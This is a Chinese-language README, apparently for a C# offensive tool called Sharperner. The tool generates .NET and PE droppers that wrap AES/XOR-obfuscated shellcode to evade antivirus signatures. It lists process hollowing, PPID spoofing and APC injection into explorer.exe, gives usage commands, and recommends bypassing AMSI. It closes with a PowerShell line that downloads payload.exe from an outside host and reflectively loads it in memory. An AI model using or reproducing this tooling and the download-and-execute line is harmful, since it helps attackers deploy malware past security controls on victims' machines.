aniqfakhrul/Sharperner
Sharperner是一个用 CSharp 编写的工具,它使用 AES 和 XOR 混淆的 Shellcode 生成 .NET Dropper。生成的可执行文件可能会绕过签名检查,但我不能确定它是否可以绕过启发式扫描。
特征
PE二进制
- 过程空心化
- PPID 欺骗
- 随机生成的 AES 密钥和 iv
最终的 Shellcode、Key 和 IV 被翻译成摩斯码 :)
.NET 二进制文件
AES + XOR 加密的 shellcode
- APC 进程注入 (explorer.exe)
- 随机函数名
- 随机生成的 AES 密钥和 iv
最终的 Shellcode、Key 和 IV 被翻译成摩斯码 :)
用法
/file B64,hex,raw shellcode
/type cs,cpp
/out Output file Location (Optional)
Example:
Sharperner.exe /file:file.txt /type:cpp
Sharperner.exe /file:file.txt /out:payload.exe
建议
为避免接触磁盘,生成的 .NET 可执行文件可以使用 powershell 反射加载。AMSI现在是敌人,amsi.fail ftw! ```csharp $data = (New-Object System.Net.WebClient).DownloadData(‘http://10.10.10.10/payload.exe‘) $assem = [System.Reflection.Assembly]::Load($data)
```